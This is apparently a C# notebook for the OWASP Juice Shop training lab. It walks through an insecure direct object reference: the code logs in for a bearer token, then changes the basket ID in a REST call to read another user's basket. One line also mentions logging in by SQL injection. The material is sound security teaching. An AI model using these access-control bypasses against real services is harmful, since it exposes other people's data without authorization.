# Broken Access Control

## View another user's shopping basket
We will be using an IDOR (Insecure direct object reference) in this attack to examin another users shopping basket. After having created an account on Juice Shop we can access our own shopping basket through the rest API.

In [ ]:
#r "nuget: System.Net.Http.Json, *-*"

In [ ]:
using System.Net.Http;
using System.Net.Http.Json;
using System.Net.Http.Headers;

const string BASE_URL = "http://localhost:3000/";
var BASE_URI = new Uri(BASE_URL); 

### 2. Login as an authenticated user
Either use sql injection or proper properties to authenticate a user

In [ ]:
#!value --name json
{
    "email": "<EMAIL>",
    "password": "<PASSWORD>"
}

In [ ]:
#!share json --from value

public struct AuthenticationToken {
    public Authentication Authentication {get;set;}
}

public struct Authentication {
    public string Token { get;set; }
    public int Bid { get;set; }
    public string Umail { get;set; }
}

var authenticationToken = string.Empty;

using(var client = new HttpClient()) {
    var content = new StringContent(json, Encoding.UTF8, "application/json");
    var uri = new Uri(BASE_URI, "rest/user/login");
    var response = await client.PostAsync(uri, content);
    response.EnsureSuccessStatusCode();

    var actualtoken = await response.Content.ReadFromJsonAsync<AuthenticationToken>();
    authenticationToken = actualtoken.Authentication.Token;
}

### Fetch your current basket
If we intercept the /basket url fetch we can see in the network tab that our basket is fetched through a rest call with the basked id as parameter in the URL. What happens if we change this value?

In [ ]:
using(var client = new HttpClient()) {
    
    var request = new HttpRequestMessage 
    {
        Method = HttpMethod.Get,
        RequestUri = new Uri(BASE_URI, "rest/basket/<BASKET_ID_HERE>")
    };

    request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", authenticationToken);
    var response = await client.SendAsync(request);
    Console.WriteLine(await response.Content.ReadAsStringAsync());
}

In [ ]:
using(var client = new HttpClient()) {
    var request = new HttpRequestMessage
    {
        Method = HttpMethod.Get,
        RequestUri = new Uri(BASE_URI, "rest/wallet/balance")
    };

    request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", authenticationToken);
    var response = await client.SendAsync(request);

    Console.WriteLine(await response.Content.ReadAsStringAsync());
}

{"status":"success","data":-29}
